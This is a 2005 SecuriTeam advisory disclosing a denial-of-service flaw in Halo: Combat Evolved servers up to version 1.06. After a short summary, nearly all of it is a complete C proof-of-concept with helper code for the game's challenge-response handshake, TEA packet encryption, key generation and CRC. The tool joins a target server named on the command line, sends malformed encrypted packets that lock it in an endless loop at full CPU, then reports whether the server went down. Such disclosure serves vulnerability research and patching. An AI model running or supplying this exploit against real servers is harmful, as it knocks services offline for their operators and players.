[NT] Halo: Combat Evolved DoS

From: SecuriTeam (support_at_securiteam.com)
Date: 05/26/05

  • Next message: SecuriTeam: "[NEWS] Prestige 650R ADSL Router DoS"
    To: list@securiteam.com
    Date: 26 May 2005 17:51:36 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Halo: Combat Evolved DoS
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.microsoft.com/games/pc/halo.aspx> Halo is the great FPS game
    developed by Bungie Studios and ported on PC by
    <http://www.gearboxsoftware.com> Gearbox Software. It is published by
    <http://www.microsoft.com/games/> Microsoft Games and has been released at
    the end of 2003.

    Attackers sending the Halo server malformed data can cause it to no longer
    respond to legitimate requests allowing attackers to cause a denial of
    service against the product.

    DETAILS

    Vulnerable Systems:
     * Halo: Combat Evolved versions 1.06 and prior
     * Halo: Combat Evolved Custom Edition version 1.00

    Immune Systems:
     * Halo: Combat Evolved version 1.07

    The game is not able to handle the malformed data with the consequence of
    entering in an endless loop that continues to check the same data. The
    effects are that the server freezes completely, so is no longer able to
    handle packets, and the CPU goes to 100%.

    Patch Availability:
    The upcoming version 1.07 should be released in these days, the bug has
    been reported to the developers exactly one month ago.

    Proof of Concept:
    /*

    by Luigi Auriemma - http://aluigi.altervista.org/poc/haloloop.zip

    */

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include "gssdkcr.h"
    #include "halo_pck_algo.h"

    #ifdef WIN32
        #include <winsock.h>
        #include "winerr.h"

        #define close closesocket
        #define ONESEC 1000
    #else
        #include <unistd.h>
        #include <sys/socket.h>
        #include <sys/types.h>
        #include <arpa/inet.h>
        #include <netinet/in.h>
        #include <netdb.h>

        #define ONESEC 1
    #endif

    #define VER "0.1"
    #define BUFFSZ 8192
    #define PORT 2302
    #define TIMEOUT 1
    #define BOOMSZ 16 // minimum is 4

    #define ADDMEM(x,y) memcpy(p, x, y); \
                        p += y;
    #define ADDINT(x) *(u_int *)p = x; \
                        p += 4;
    #define SEND(x,y) if(sendto(sd, x, y, 0, (struct sockaddr *)&peer,
    sizeof(peer)) \
                          < 0) std_err();
    #define RECV(x,y) len = recvfrom(sd, x, y, 0, NULL, NULL); \
                        if(len < 0) std_err();
    #define SOCKTOUT if(len < 0) { \
                            fputs("\nError: socket timeout, no reply
    received\n\n", stdout); \
                            exit(1); \
                        }

    int send_recv(int sd, u_char *in, int insz, u_char *out, int outsz);
    int show_info(u_char *data, int len);
    int timeout(int sock);
    u_int resolv(char *host);
    void std_err(void);

    struct sockaddr_in peer;

    int main(int argc, char *argv[]) {
        int sd,
                len,
                ver;
        u_short port = PORT;
        u_char buff[BUFFSZ + 1],
                info[] =
                    "\xfe\xfd" "\x00" "\x00\x00\x00\x00" "\xff\x00\x00",
                enckey[16],
                deckey[16],
                *psdk,
                *p;

    #pragma pack(1) // a basic header
        struct gssdk_header {
            u_short sign;
            u_char type;
            u_short gs1;
            u_short gs2;
        } *gh;
    #pragma pack()

    #ifdef WIN32
        WSADATA wsadata;
        WSAStartup(MAKEWORD(1,0), &wsadata);
    #endif

        setbuf(stdout, NULL);

        fputs("\n"
            "Halo <= 1.06 endless loop "VER"\n"
            "by Luigi Auriemma\n"
            "e-mail: aluigi@altervista.org\n"
            "web: http://aluigi.altervista.org\n"
            "\n", stdout);

        if(argc < 2) {
            printf("\n"
                "Usage: %s <host> [port(%d)]\n"
                "\n", argv[0], port);
            exit(1);
        }

        if(argc > 2) port = atoi(argv[2]);

        peer.sin_addr.s_addr = resolv(argv[1]);
        peer.sin_port = htons(port);
        peer.sin_family = AF_INET;

        printf("- target %s : %hu\n",
            inet_ntoa(peer.sin_addr), port);

        fputs("- request informations:\n", stdout);
        sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
        if(sd < 0) std_err();
        *(u_int *)(info + 3) = ~time(NULL);
        len = send_recv(sd, info, sizeof(info) - 1, buff, BUFFSZ);
        close(sd);
        SOCKTOUT;

        buff[len] = 0x00;
        ver = show_info(buff, len);
        if(ver <= 0) {
            fputs("\nError: the server version has not been found, it is
    needed to join\n\n", stdout);
            exit(1);
        }
        printf("\n- use version: %d\n", ver);

        gh = (struct gssdk_header *)buff;
        psdk = buff + 7;

        sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
        if(sd < 0) std_err();

        gh->sign = htons(0xfefe);
        gh->type = 1;
        gh->gs1 = htons(0);
        gh->gs2 = htons(0);
        memset(psdk, '0', 32);
        gssdkcr(psdk, psdk, 0);

        len = send_recv(sd, buff, 39, buff, BUFFSZ);
        SOCKTOUT;

        if((gh->type != 2) || (ntohs(gh->gs1) != 0) || (ntohs(gh->gs2) != 1))
    {
            fputs("\n the first packet doesn't seem to have been accepted, I
    continue\n", stdout);
        }

        gh->sign = htons(0xfefe);
        gh->type = 3;
        gh->gs1 = htons(1);
        gh->gs2 = htons(1);
        gssdkcr(psdk, buff + 39, 0);
        p = psdk + 32;

        halo_generate_keys(NULL, enckey);

        ADDMEM(enckey, 16);
        ADDINT(ver);

        len = send_recv(sd, buff, p - buff, buff, BUFFSZ);
        SOCKTOUT;

        for(;;) {
            if((gh->type == 4) && (ntohs(gh->gs1) == 1) && (ntohs(gh->gs2) ==
    2)) {
                halo_generate_keys(psdk, deckey);
                halo_generate_keys(psdk, enckey);
            }

            if(!gh->type) {
                fputs("- connection accepted\n", stdout);
                halo_tea_decrypt(buff + 7, len - 7, deckey);

                gh->sign = htons(0xfefe);
                gh->type = 0;
                gh->gs1 = htons(2);
                gh->gs2 = htons(3);

                memset(psdk, 0xff, BOOMSZ); // malformed data
                len = BOOMSZ;

                *(u_int *)(psdk + len) = halo_crc32(psdk, len);
                len += 4;

                halo_tea_encrypt(psdk, len, enckey);
                len += 7;

                fputs("- send malformed data\n", stdout);
                len = send_recv(sd, buff, len, buff, BUFFSZ);
                if(len < 0) break;
            }

            if((gh->type == 5) && (ntohs(gh->gs1) == 1) && (ntohs(gh->gs2) ==
    2)) {
                fputs("\n"
                    "Error: server is full or has not accepted the connection
    so cannot be tested.\n"
                    " Retry later\n"
                    "\n", stdout);
                exit(1);
            }

            if(timeout(sd) < 0) break;
            RECV(buff, BUFFSZ);
        }

        close(sd);

        fputs("- check server:\n", stdout);
        sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
        if(sd < 0) std_err();
        len = send_recv(sd, info, sizeof(info) - 1, buff, BUFFSZ);
        close(sd);
        if(len < 0) {
            fputs("\nServer IS vulnerable!!!\n\n", stdout);
        } else {
            fputs("\nServer doesn't seem vulnerable\n\n", stdout);
        }

        return(0);
    }

    int send_recv(int sd, u_char *in, int insz, u_char *out, int outsz) {
        int i,
                len;

        for(i = 3; i; i--) {
            SEND(in, insz);
            if(!timeout(sd)) break;
        }
        if(!i) return(-1);

        RECV(out, outsz);
        return(len);
    }

    int show_info(u_char *data, int len) {
        u_char *v,
                *limit = data + len;
        int nt = 0,
                d,
                ver = -1;

        data += 5;
        while(data < limit) {
            d = strlen(data);
            if(nt & 1) {
                if(!ver) {
                    v = strrchr(data, '.');
                    if(v) ver = atoi(v + 1) * 1000;
                }
                printf("%s\n", data);
            } else {
                if(!d) break;
                if(!strcmp(data, "gamever")) ver = 0;
                printf("%30s: ", data);
            }
            data += d + 1;
            nt++;
        }
        return(ver);
    }

    int timeout(int sock) {
        struct timeval tout;
        fd_set fd_read;
        int err;

        tout.tv_sec = TIMEOUT;
        tout.tv_usec = 0;
        FD_ZERO(&fd_read);
        FD_SET(sock, &fd_read);
        err = select(sock + 1, &fd_read, NULL, NULL, &tout);
        if(err < 0) std_err();
        if(!err) return(-1);
        return(0);
    }

    u_int resolv(char *host) {
        struct hostent *hp;
        u_int host_ip;

        host_ip = inet_addr(host);
        if(host_ip == INADDR_NONE) {
            hp = gethostbyname(host);
            if(!hp) {
                printf("\nError: Unable to resolv hostname (%s)\n", host);
                exit(1);
            } else host_ip = *(u_int *)hp->h_addr;
        }
        return(host_ip);
    }

    #ifndef WIN32
        void std_err(void) {
            perror("\nError");
            exit(1);
        }
    #endif

    gssdkcr.h:
    /*

    GS SDK challenge-response algorithm 0.1
    by Luigi Auriemma
    e-mail: aluigi@autistici.org
    web: http://aluigi.altervista.org

    INTRODUCTION
    -===========
    This algorithm is referred to the challenge-response method used by some
    of the games that use the Gamespy SDK like Halo and Soldier of Anarchy.
    This handshake is used to let valid client to join the game servers, in
    fact if clients answer with a wrong response they are immediately kicked.
    If we get Halo as practical example we can see that we have the
    following 3 packets easily visible using a packet analyzer:
    - client -> server: client challenge (a text string of 32 chars)
    - server -> client: response to the client's challenge plus the
                        server's challenge
    - client -> server: response calculated on the server's challenge

    HOW TO USE
    -=========
    The function gssdkcr() requires the following parameters:
    - the destination buffer that will contain the resulted string.
      It must be 33 bytes long (32 plus the final NULL byte).
    - the "challenge" string (sent by the server or by the client).
    - the buffer containing the game's text string used for the calculation
      of the response.
      By default the Gamespy SDK uses 3b8dd8995f7c40a9a5c5b7dd5b481341 but
      some games might use different values like Soldier of Anarchy that
      uses 0AB3F935936211D19A2B080000300512 (the CLSID of the game).
      However if the value is NULL, will be used the default value.

    The return value is a pointer to the destination string.

    EXAMPLE
    -======
    In Halo for example we must use:
      char resp[33],
            chall[] = ")nTu4y&t,Cr{P5j{6k<]^E@-ToF#Kg>m";
      gssdkcr(resp, chall, 0);

    while in Soldier of Anarchy we must change this one:
      gssdkcr(resp, chall, "0AB3F935936211D19A2B080000300512");

    LICENSE
    -======
        Copyright 2004 Luigi Auriemma

        This program is free software; you can redistribute it and/or modify
        it under the terms of the GNU General Public License as published by
        the Free Software Foundation; either version 2 of the License, or
        (at your option) any later version.

        This program is distributed in the hope that it will be useful,
        but WITHOUT ANY WARRANTY; without even the implied warranty of
        MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
        GNU General Public License for more details.

        You should have received a copy of the GNU General Public License
        along with this program; if not, write to the Free Software
        Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
    USA

        http://www.gnu.org/licenses/gpl.txt

    */

    #include <time.h>

    unsigned char *gssdkcr(
      unsigned char *dst,
      unsigned char *src,
      unsigned char *key) {

        unsigned int oz,
                        i,
                        keysz,
                        count,
                        old,
                        tmp,
                        randnum;
        unsigned char *ptr;
        const static char
                        key_default[] =
                        "3b8dd8995f7c40a9a5c5b7dd5b481341";

        randnum = time(NULL); // something random
        if(!key) key = (unsigned char *)key_default;
        keysz = strlen(key);

        ptr = src;
        old = *ptr;
        tmp = old < 0x4f;
        count = 0;
        for(oz = i = 1; i < 32; i++) {
            count ^= ((((*ptr < old) ^ ((old ^ i) & 1)) ^ (*ptr & 1)) ^ tmp);
            ptr++;
            if(count) {
                if(!(*ptr & 1)) { oz = 0; break; }
            } else {
                if(*ptr & 1) { oz = 0; break; }
            }
        }

        ptr = dst;
        for(i = 0; i < 32; i++, ptr++) {
            if(!oz || !i || (i == 13)) {
                randnum = (randnum * 0x343FD) + 0x269EC3;
                *ptr = (((randnum >> 16) & 0x7fff) % 93) + 33;
                continue;
            } else if((i == 1) || (i == 14)) {
                old = src[i];
            } else {
                old = src[i - 1];
            }
            tmp = (old * i) * 17991;
            old = src[(key[(src[i] + i) % keysz] + (src[i] * i)) & 31];
            *ptr = ((old ^ key[tmp % keysz]) % 93) + 33;
        }
        *ptr = 0x00;

        return(dst);
    }

    halo_pck_algo.h:
    /*

    Halo packets decryption/encryption algorithm and keys builder 0.1.1
    by Luigi Auriemma
    e-mail: aluigi@autistici.org
    web: http://aluigi.altervista.org

    INTRODUCTION
    -===========
    As you know Halo uses encrypted packets and the set of functions
    available here is all you need to decrypt and encrypt the packets of
    this game.
    It's a bit complex to explain the details of the algorithm moreover for
    me since I have no knowledge of cryptography, however it uses the TEA
    algorithm to encrypt and decrypt the packets and exist 2 keys exchanged
    between the 2 hosts but is not possible for a third person to decrypt
    the data between them due to the usage of this nice method to handle
    keys (also if you catch the exchanged keys you will be not able to
    decrypt the stuff).
    FYI, the data in the packets is stored in bitstream format and the
    latest 4 bytes are a classical 32 bits checksum of the packet, so keep
    that in mind.

    HOW TO USE
    -=========
    First, you need to specify the following buffers in your program:

      u_char enckey[16], // used to encrypt
                deckey[16]; // used to decrypt

    You need only 3 functions to do everything but there are many others
    available in this file so you have the maximum freedom of using your
    preferred way to handle the keys and the data:

    - halo_generate_keys()
      needs 2 arguments, the source key and the destination key
      (automatically zeroed by the halo_create_key() function).
      This function must be called the first time to send the key to the
      other host and other 2 consecutive times to calculate the decryption
      and encryption key.

      To create your key use NULL as source key and a buffer of 16 bytes
      that will contain the generated key as destination.
        Example: halo_generate_keys(NULL, basekey); // use a temporary
    buffer

      To create the decryption and encryption keys use the key received from
      the other host as source and a buffer of 16 bytes as destination.
        Example: halo_generate_keys(packet_buffer + 7, deckey);
                   halo_generate_keys(packet_buffer + 7, enckey);

    - void halo_tea_decrypt()
      needs 3 arguments, the buffer to decrypt, its size and the decryption
      key previously generated with the halo_generate_keys() function:
        halo_tea_decrypt(buffer, len, deckey);

    - void halo_tea_encrypt()
      needs 3 arguments, the buffer to encrypt, its size and the encryption
      key previously generated:
        halo_tea_encrypt(buffer, len, enckey);

    Useful is also the halo_crc32() function that calculates the CRC number
    that must be placed at the end of each packet. The data that must be
    passed to the function usually starts at offset 7 of each packet, the
    same resulted from the decryption/encryption. Remember that the size
    must not contain the last 4 bytes occupied by the checksum.

    REAL EXAMPLES
    -============
    Check the stuff I have written for Halo on my website:

      http://aluigi.altervista.org/papers.htm#halo

    LICENSE
    -======
        Copyright 2005 Luigi Auriemma

        This program is free software; you can redistribute it and/or modify
        it under the terms of the GNU General Public License as published by
        the Free Software Foundation; either version 2 of the License, or
        (at your option) any later version.

        This program is distributed in the hope that it will be useful,
        but WITHOUT ANY WARRANTY; without even the implied warranty of
        MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
        GNU General Public License for more details.

        You should have received a copy of the GNU General Public License
        along with this program; if not, write to the Free Software
        Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
    USA

        http://www.gnu.org/licenses/gpl.txt
    */

    #include <string.h>
    #include <time.h>

    #ifndef __u_char_defined
        typedef unsigned char u_char;
        typedef unsigned long u_long;
    #endif

    void halo_create_randhash(u_char *out) {
        u_long randnum;
        int i;
        const static char hex[] = "0123456789ABCDEF";

        randnum = time(NULL);
        for(i = 0; i < 16; i++) {
            randnum = (randnum * 0x343FD) + 0x269EC3;
            *out++ = hex[(randnum >> 16) & 15];
        }
        *out = 0x00;
    }

    void halo_byte2hex(u_char *in, u_char *out) {
        int i;
        const static char hex[] = "0123456789ABCDEF";

        for(i = 16; i; i--) {
            if(*in) break;
            in++;
        }
        while(i--) {
            *out++ = hex[*in >> 4];
            *out++ = hex[*in & 15];
            in++;
        }
        *out = 0x00;
    }

    void halo_hex2byte(u_char *in, u_char *out) {
        int i,
                j,
                t;

        memset(out, 0x00, 16);
        while(*in) {
            for(j = 0; j < 4; j++) {
                t = 0;
                for(i = 15; i >= 0; i--) {
                    t += (out[i] << 1);
                    out[i] = t;
                    t >>= 8;
                }
            }
            t = *in |= 0x20;
            out[15] |= ((t - (0x27 * (t > 0x60))) - 0x30);
            in++;
        }
    }

    void halo_fix_check(u_char *key1, u_char *key2) {
        int i,
                j;

        for(i = 0; i < 16; i++) {
            if(key1[i] != key2[i]) break;
        }
        if((i < 16) && (key1[i] > key2[i])) {
            for(j = 0, i = 16; i--; j >>= 8) {
                j += (key1[i] - key2[i]);
                key1[i] = j;
            }
        }
    }

    void halo_key_scramble(u_char *key1, u_char *key2, u_char *fixnumb) {
        int i,
                j,
                cnt;
        u_char tk1[16],
                tk2[16];

        memcpy(tk1, key1, 16);
        memcpy(tk2, key2, 16);
        memset(key1, 0x00, 16);

        cnt = 16 << 3;
        while(cnt--) {
            if(tk1[15] & 1) {
                for(j = 0, i = 16; i--; j >>= 8) {
                    j += key1[i] + tk2[i];
                    key1[i] = j;
                }
                halo_fix_check(key1, fixnumb);
            }

            for(j = i = 0; i < 16; i++, j <<= 8) {
                j |= tk1[i];
                tk1[i] = j >> 1;
                j &= 1;
            }

            for(j = 0, i = 16; i--; j >>= 8) {
                j += (tk2[i] << 1);
                tk2[i] = j;
            }
            halo_fix_check(tk2, fixnumb);
        }
    }

    void halo_create_key(u_char *keystr, u_char *randhash, u_char *fixnum,
    u_char *dest) {
        int i,
                        j,
                        cnt;
        static u_char keystrb[16],
                        randhashb[16],
                        fixnumb[16];

        halo_hex2byte(keystr, keystrb);
        halo_hex2byte(randhash, randhashb);
        halo_hex2byte(fixnum, fixnumb);

        memset(dest, 0x00, 16);
        dest[15] = 0x01;

        cnt = 16 << 3;
        while(cnt--) {
            if(randhashb[15] & 1) {
                halo_key_scramble(dest, keystrb, fixnumb);
            }
            halo_key_scramble(keystrb, keystrb, fixnumb);

            for(j = i = 0; i < 16; i++, j <<= 8) {
                j |= randhashb[i];
                randhashb[i] = j >> 1;
                j &= 1;
            }
        }
    }

    void tea_decrypt(u_long *p, u_long *keyl) {
        u_long y,
                z,
                sum,
                a = keyl[0],
                b = keyl[1],
                c = keyl[2],
                d = keyl[3];
        int i;

        y = p[0];
        z = p[1];
        sum = 0xc6ef3720;
        for(i = 0; i < 32; i++) {
            z -= ((y << 4) + c) ^ (y + sum) ^ ((y >> 5) + d);
            y -= ((z << 4) + a) ^ (z + sum) ^ ((z >> 5) + b);
            sum -= 0x9e3779b9;
        }
        p[0] = y;
        p[1] = z;
    }

    void halo_tea_decrypt(u_char *data, int size, u_char *key) {
        u_long *p = (u_long *)data,
                *keyl = (u_long *)key;

        if(size & 7) {
            tea_decrypt((u_long *)(data + size - 8), keyl);
        }

        size >>= 3;
        while(size--) {
            tea_decrypt(p, keyl);
            p += 2;
        }
    }

    void tea_encrypt(u_long *p, u_long *keyl) {
        u_long y,
                z,
                sum,
                a = keyl[0],
                b = keyl[1],
                c = keyl[2],
                d = keyl[3];
        int i;

        y = p[0];
        z = p[1];
        sum = 0;
        for(i = 0; i < 32; i++) {
            sum += 0x9e3779b9;
            y += ((z << 4) + a) ^ (z + sum) ^ ((z >> 5) + b);
            z += ((y << 4) + c) ^ (y + sum) ^ ((y >> 5) + d);
        }
        p[0] = y;
        p[1] = z;
    }

    void halo_tea_encrypt(u_char *data, int size, u_char *key) {
        u_long *p = (u_long *)data,
                *keyl = (u_long *)key;
        int rest = size & 7;

        size >>= 3;
        while(size--) {
            tea_encrypt(p, keyl);
            p += 2;
        }

        if(rest) {
            tea_encrypt((u_long *)((u_char *)p - (8 - rest)), keyl);
        }
    }

    void halo_generate_keys(u_char *source_key, u_char *dest_key) {
        static u_char tmp_key[33] = "3",
                        fixed_key[33] = "10001",
                        randhash[17];

        if(!source_key) { // encryption
            halo_create_randhash(randhash);
        } else {
            halo_byte2hex(source_key, tmp_key);
        }

        source_key = tmp_key;
        halo_create_key(source_key, randhash, fixed_key, dest_key);
    }

    u_long halo_crc32(u_char *data, int size) {
        const static u_long crctable[] = {
            0x00000000, 0x77073096, 0xee0e612c, 0x990951ba,
            0x076dc419, 0x706af48f, 0xe963a535, 0x9e6495a3,
            0x0edb8832, 0x79dcb8a4, 0xe0d5e91e, 0x97d2d988,
            0x09b64c2b, 0x7eb17cbd, 0xe7b82d07, 0x90bf1d91,
            0x1db71064, 0x6ab020f2, 0xf3b97148, 0x84be41de,
            0x1adad47d, 0x6ddde4eb, 0xf4d4b551, 0x83d385c7,
            0x136c9856, 0x646ba8c0, 0xfd62f97a, 0x8a65c9ec,
            0x14015c4f, 0x63066cd9, 0xfa0f3d63, 0x8d080df5,
            0x3b6e20c8, 0x4c69105e, 0xd56041e4, 0xa2677172,
            0x3c03e4d1, 0x4b04d447, 0xd20d85fd, 0xa50ab56b,
            0x35b5a8fa, 0x42b2986c, 0xdbbbc9d6, 0xacbcf940,
            0x32d86ce3, 0x45df5c75, 0xdcd60dcf, 0xabd13d59,
            0x26d930ac, 0x51de003a, 0xc8d75180, 0xbfd06116,
            0x21b4f4b5, 0x56b3c423, 0xcfba9599, 0xb8bda50f,
            0x2802b89e, 0x5f058808, 0xc60cd9b2, 0xb10be924,
            0x2f6f7c87, 0x58684c11, 0xc1611dab, 0xb6662d3d,
            0x76dc4190, 0x01db7106, 0x98d220bc, 0xefd5102a,
            0x71b18589, 0x06b6b51f, 0x9fbfe4a5, 0xe8b8d433,
            0x7807c9a2, 0x0f00f934, 0x9609a88e, 0xe10e9818,
            0x7f6a0dbb, 0x086d3d2d, 0x91646c97, 0xe6635c01,
            0x6b6b51f4, 0x1c6c6162, 0x856530d8, 0xf262004e,
            0x6c0695ed, 0x1b01a57b, 0x8208f4c1, 0xf50fc457,
            0x65b0d9c6, 0x12b7e950, 0x8bbeb8ea, 0xfcb9887c,
            0x62dd1ddf, 0x15da2d49, 0x8cd37cf3, 0xfbd44c65,
            0x4db26158, 0x3ab551ce, 0xa3bc0074, 0xd4bb30e2,
            0x4adfa541, 0x3dd895d7, 0xa4d1c46d, 0xd3d6f4fb,
            0x4369e96a, 0x346ed9fc, 0xad678846, 0xda60b8d0,
            0x44042d73, 0x33031de5, 0xaa0a4c5f, 0xdd0d7cc9,
            0x5005713c, 0x270241aa, 0xbe0b1010, 0xc90c2086,
            0x5768b525, 0x206f85b3, 0xb966d409, 0xce61e49f,
            0x5edef90e, 0x29d9c998, 0xb0d09822, 0xc7d7a8b4,
            0x59b33d17, 0x2eb40d81, 0xb7bd5c3b, 0xc0ba6cad,
            0xedb88320, 0x9abfb3b6, 0x03b6e20c, 0x74b1d29a,
            0xead54739, 0x9dd277af, 0x04db2615, 0x73dc1683,
            0xe3630b12, 0x94643b84, 0x0d6d6a3e, 0x7a6a5aa8,
            0xe40ecf0b, 0x9309ff9d, 0x0a00ae27, 0x7d079eb1,
            0xf00f9344, 0x8708a3d2, 0x1e01f268, 0x6906c2fe,
            0xf762575d, 0x806567cb, 0x196c3671, 0x6e6b06e7,
            0xfed41b76, 0x89d32be0, 0x10da7a5a, 0x67dd4acc,
            0xf9b9df6f, 0x8ebeeff9, 0x17b7be43, 0x60b08ed5,
            0xd6d6a3e8, 0xa1d1937e, 0x38d8c2c4, 0x4fdff252,
            0xd1bb67f1, 0xa6bc5767, 0x3fb506dd, 0x48b2364b,
            0xd80d2bda, 0xaf0a1b4c, 0x36034af6, 0x41047a60,
            0xdf60efc3, 0xa867df55, 0x316e8eef, 0x4669be79,
            0xcb61b38c, 0xbc66831a, 0x256fd2a0, 0x5268e236,
            0xcc0c7795, 0xbb0b4703, 0x220216b9, 0x5505262f,
            0xc5ba3bbe, 0xb2bd0b28, 0x2bb45a92, 0x5cb36a04,
            0xc2d7ffa7, 0xb5d0cf31, 0x2cd99e8b, 0x5bdeae1d,
            0x9b64c2b0, 0xec63f226, 0x756aa39c, 0x026d930a,
            0x9c0906a9, 0xeb0e363f, 0x72076785, 0x05005713,
            0x95bf4a82, 0xe2b87a14, 0x7bb12bae, 0x0cb61b38,
            0x92d28e9b, 0xe5d5be0d, 0x7cdcefb7, 0x0bdbdf21,
            0x86d3d2d4, 0xf1d4e242, 0x68ddb3f8, 0x1fda836e,
            0x81be16cd, 0xf6b9265b, 0x6fb077e1, 0x18b74777,
            0x88085ae6, 0xff0f6a70, 0x66063bca, 0x11010b5c,
            0x8f659eff, 0xf862ae69, 0x616bffd3, 0x166ccf45,
            0xa00ae278, 0xd70dd2ee, 0x4e048354, 0x3903b3c2,
            0xa7672661, 0xd06016f7, 0x4969474d, 0x3e6e77db,
            0xaed16a4a, 0xd9d65adc, 0x40df0b66, 0x37d83bf0,
            0xa9bcae53, 0xdebb9ec5, 0x47b2cf7f, 0x30b5ffe9,
            0xbdbdf21c, 0xcabac28a, 0x53b39330, 0x24b4a3a6,
            0xbad03605, 0xcdd70693, 0x54de5729, 0x23d967bf,
            0xb3667a2e, 0xc4614ab8, 0x5d681b02, 0x2a6f2b94,
            0xb40bbe37, 0xc30c8ea1, 0x5a05df1b, 0x2d02ef8d };
        u_long crc = 0xffffffffL;

        while(size--) {
            crc = crctable[(*data ^ crc) & 0xff] ^ (crc >> 8);
            data++;
        }
        return(crc);
    }

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:aluigi@autistici.org> Luigi
    Auriemma.
    The original article can be found at: <http://aluigi.altervista.org>
    http://aluigi.altervista.org

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[NEWS] Prestige 650R ADSL Router DoS"

    Relevant Pages

    • [NEWS] Prestige 650R ADSL Router DoS
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Prestige 600 fails to handle malformed fragmented IP packets. ... int open_packet{ ... int send_packet(int s, struct sockaddr_in saddr, struct sockaddr_in daddr, ...
      (Securiteam)
    • Re: Two 3825s wont talk to each other
      ... DDR TXCRC Int Mask 1 DDR TXClk Loss Int Mask 1 ... Network Interrupt Enable: ... Last clearing of "show interface" counters never ... input packets with dribble condition detected ...
      (comp.dcom.sys.cisco)
    • Re: Proxying bytes from one socket to another...
      ... this only affects small packets like you said. ... socket option. ... ACKby themselves - then the server is free to send more data. ... int Receive; ...
      (microsoft.public.dotnet.framework.performance)
    • C or C++ program?
      ... Data Packets are received from a socket and consist of 3 elements: ... Listing 1 represents what I know will not work but illustrates the ... {int ptype; ... {x = BlockForNextPacket();} ...
      (comp.lang.c)
    • [PATCH RFC 4/5] tun: vringfd xmit support.
      ... The user does a write to push out packets from the buffer. ... int debug; ... case TUNSETRECVVRING: ...
      (Linux-Kernel)